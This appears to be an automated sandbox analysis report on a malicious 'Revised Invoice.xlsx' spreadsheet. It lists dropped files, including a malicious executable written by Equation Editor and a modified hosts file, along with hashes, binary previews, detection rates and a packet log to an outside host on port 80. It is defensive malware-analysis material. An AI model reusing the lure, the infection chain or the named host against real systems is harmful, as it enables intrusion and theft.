                                                                SHA1:17EAA8A28E7ABF096E97537EFE25A34CD7C1FD80
                                                                SHA-256:5DB917AB6DC8A42A43617850DFBE2C7F26A7F810B229B349E9DD2A2D615671D2
                                                                SHA-512:D5ED3AD13D58B6D41347D4521F71F9C5DCC3CA706AD1E3A96A9837C8E9087EB511896CA5B49904FC13E6FA176960F4B538379638FCF1D5E8DF6B30072F216BDA
                                                                Malicious:false
                                                                Preview:0..y...*.H.........y.0..y....1.0...`.H.e......0..jC..+.....7.....j30..j.0...+.....7........{.ZV....220608070702Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                C:\Users\user\AppData\Local\Temp\~DF32456D6BB7003297.TMP

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\~DF7118ACA162BCA7FE.TMP

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:CDFV2 Encrypted
                                                                Category:dropped
                                                                Size (bytes):113016
                                                                Entropy (8bit):7.943805892340851
                                                                Encrypted:false
                                                                SSDEEP:3072:NIGrEmru0128j0E5OK70W6dfmT2i14PtxbBLpyUsUJLJ:muB1Lj0EoeBPB4jB9yiJt
                                                                MD5:2474F47DD5CB99A8913FBC95F164FD38
                                                                SHA1:42BB89241B10C90A4B52D07BD31B9735CA41F5D5
                                                                SHA-256:BE9F68F2284F924AE4696B48AA4C1FF5B771AF13B09C8672F07CD600E4169370
                                                                SHA-512:8734D6D14173E2DCEE8BF9B0B80A7E185BC4DB95E1780B75F208BDD56E902CC48C18502D85EFA8ECEA7BB21116E710170229396EC874597C605604C24473B36A
                                                                Malicious:false
                                                                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                C:\Users\user\AppData\Local\Temp\~DF80246CC9701FFBEC.TMP

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\~DFA690ECBD7F118428.TMP

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\Desktop\~$Revised Invoice.xlsx

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):165
                                                                Entropy (8bit):1.4377382811115937
                                                                Encrypted:false
                                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                Malicious:true
                                                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                C:\Users\Public\regasm_svchost.exe

                                                                Download File
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):696832
                                                                Entropy (8bit):7.590585064844322
                                                                Encrypted:false
                                                                SSDEEP:12288:OVcgR2iNDXR0GncRYx90+HKXE9i/KhCm9oD208AnZIoa6ew6J/O+B7UPzMIr4ujQ:2cW1rRnc+xVH0Qi/KUmMRdGTTwcO
                                                                MD5:D55AB6E5A705E970AD32977BE467294E
                                                                SHA1:286C13677D6E0EA6450D11028CCE45A3F5552A88
                                                                SHA-256:CF1D56BB74474AEEE555731DC0DDBFACF0E4CE6ADBA42070154A4E2AA157B532
                                                                SHA-512:54B8961ABD87848E087743A45511F8E8DC7152E632F0E66C63A56A649683BE6E10D851B6057DCCB16BD605E725775186CA7AC33B79CE0211B09ECE32FEE59EAA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: Metadefender, Detection: 38%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 73%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.b..............P.............n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H..........T............................................................0..........(....*...0..).......r...p..r...p(....(....:.... c... .._a%..^E....5...........Q.......}.......a...8.....(....(....r...p(....,. ....%+. .m..%&. .\..Za+..-. ..6.%+. ?..T%&. .E.Za+.(..... >.P[8p...r)..p(..... R..eZ ^[&_a8T....r+..p(....(....-. .."_%+. ...Q%&. ].`HZa8&....(.... ..zg8...........s%...(....%.(.....(....*....0...............('...*..0...........u......-J 9F.. ....a%...^E........S....

                                                                C:\Windows\System32\drivers\etc\hosts

                                                                Download File
                                                                Process:C:\Users\Public\regasm_svchost.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):835
                                                                Entropy (8bit):4.694294591169137
                                                                Encrypted:false
                                                                SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                MD5:6EB47C1CF858E25486E42440074917F2
                                                                SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                Malicious:true
                                                                Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                                Static File Info

                                                                General

                                                                File type:CDFV2 Encrypted
                                                                Entropy (8bit):7.943805892340851
                                                                TrID:
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                File name:Revised Invoice.xlsx
                                                                File size:113016
                                                                MD5:2474f47dd5cb99a8913fbc95f164fd38
                                                                SHA1:42bb89241b10c90a4b52d07bd31b9735ca41f5d5
                                                                SHA256:be9f68f2284f924ae4696b48aa4c1ff5b771af13b09c8672f07cd600e4169370
                                                                SHA512:8734d6d14173e2dcee8bf9b0b80a7e185bc4db95e1780b75f208bdd56e902cc48c18502d85efa8ecea7bb21116e710170229396ec874597c605604c24473b36a
                                                                SSDEEP:3072:NIGrEmru0128j0E5OK70W6dfmT2i14PtxbBLpyUsUJLJ:muB1Lj0EoeBPB4jB9yiJt
                                                                TLSH:3FB30133215027FEDBB865309FB6EEB074215EF116B563118361BBCA93F3A84696BD04
                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                File Icon

                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 26, 2022 17:45:45.567749977 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.683339119 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.683430910 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.684885979 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.802946091 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.802973986 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.802989960 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803002119 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803016901 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803029060 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803041935 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803056002 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803071976 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803087950 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.803225994 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.803258896 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.820605040 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.917804956 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917845964 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917866945 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917881966 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917907000 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917924881 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917942047 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917957067 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.917979002 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918000937 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918016911 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918037891 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918055058 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918071032 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918083906 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918097019 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918108940 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918121099 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918133020 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918143988 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:45.918334007 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.918363094 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:45.920876026 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.032994032 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033024073 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033039093 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033054113 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033070087 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033093929 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033111095 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033179998 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033195972 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033212900 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033229113 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033243895 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033246994 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033257008 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033271074 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033287048 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033293009 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033337116 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033348083 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033385992 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033390999 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033407927 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033440113 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033454895 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033482075 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033528090 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033533096 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033581018 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033675909 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033693075 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033708096 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033742905 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033766031 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033782959 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033812046 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033817053 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033818007 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033828020 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033869982 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.033914089 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033929110 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033946991 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.033976078 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034006119 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034090996 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034107924 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034121037 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034137964 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034148932 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034153938 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034168005 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034172058 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034183979 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034185886 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034195900 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034203053 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034219027 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034219980 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034235001 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034248114 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034250021 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.034265041 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.034310102 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.035156012 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.147886992 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.147934914 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.147952080 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.147967100 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.147983074 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.147998095 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148014069 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148066044 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148082972 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148093939 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148093939 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.148111105 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148123026 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148139000 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148140907 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.148154020 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148169041 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148185015 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148188114 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.148200989 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148216963 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148230076 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.148233891 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148252964 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.148272038 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.148304939 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149475098 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149493933 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149508953 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149523973 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149539948 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149555922 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149588108 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149590015 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149606943 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149624109 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149627924 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149638891 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149656057 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149658918 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149672031 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149686098 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149702072 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149717093 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149732113 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149749041 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149763107 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149777889 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149780035 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149785042 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149787903 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149792910 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149808884 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149825096 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149840117 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149853945 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149854898 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149873972 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149888039 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149890900 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149904013 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149919033 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.149962902 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.149981976 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.151539087 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262805939 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262835026 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262850046 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262865067 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262881041 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262896061 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262895107 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262913942 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262919903 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262923956 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262927055 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262931108 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.262947083 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262950897 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.262969971 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.265922070 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.265947104 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.265963078 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.265979052 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.265995979 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266011000 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266011953 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266026974 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266031027 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266041994 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266052961 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266060114 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266064882 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266081095 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266086102 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266097069 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266108036 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266112089 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266123056 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266128063 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266144037 CEST8049173107.174.138.192192.168.2.22
                                                                Jul 26, 2022 17:45:46.266153097 CEST4917380192.168.2.22107.174.138.192
                                                                Jul 26, 2022 17:45:46.266158104 CEST8049173107.174.138.192192.168.2.22
